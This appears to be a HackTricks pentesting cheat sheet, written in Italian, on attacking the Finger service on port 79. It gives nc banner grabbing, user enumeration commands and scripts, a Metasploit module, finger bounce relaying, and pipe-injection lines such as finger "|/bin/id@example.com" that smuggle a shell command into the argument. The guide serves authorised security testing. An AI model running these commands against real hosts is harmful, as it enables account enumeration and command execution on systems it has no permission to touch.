79 - Pentesting Finger

Reading time: 2 minutes

tip

Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Informazioni di base

Il programma/servizio Finger è utilizzato per recuperare dettagli sugli utenti del computer. Tipicamente, le informazioni fornite includono il nome utente, nome completo, e, in alcuni casi, dettagli aggiuntivi. Questi dettagli extra potrebbero comprendere la posizione dell'ufficio e il numero di telefono (se disponibile), l'ora in cui l'utente ha effettuato l'accesso, il periodo di inattività (tempo di inattività), l'ultima volta che la posta è stata letta dall'utente e i contenuti dei file di piano e progetto dell'utente.

Porta predefinita: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumerazione

Acquisizione del banner/Connessione di base

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumerazione degli utenti

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

In alternativa, puoi utilizzare finger-user-enum da pentestmonkey, alcuni esempi:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap esegue uno script utilizzando script predefiniti

Metasploit utilizza più trucchi di Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Esecuzione comandi

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Usa un sistema come relay finger

finger user@host@victim
finger @internal@external

tip

Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks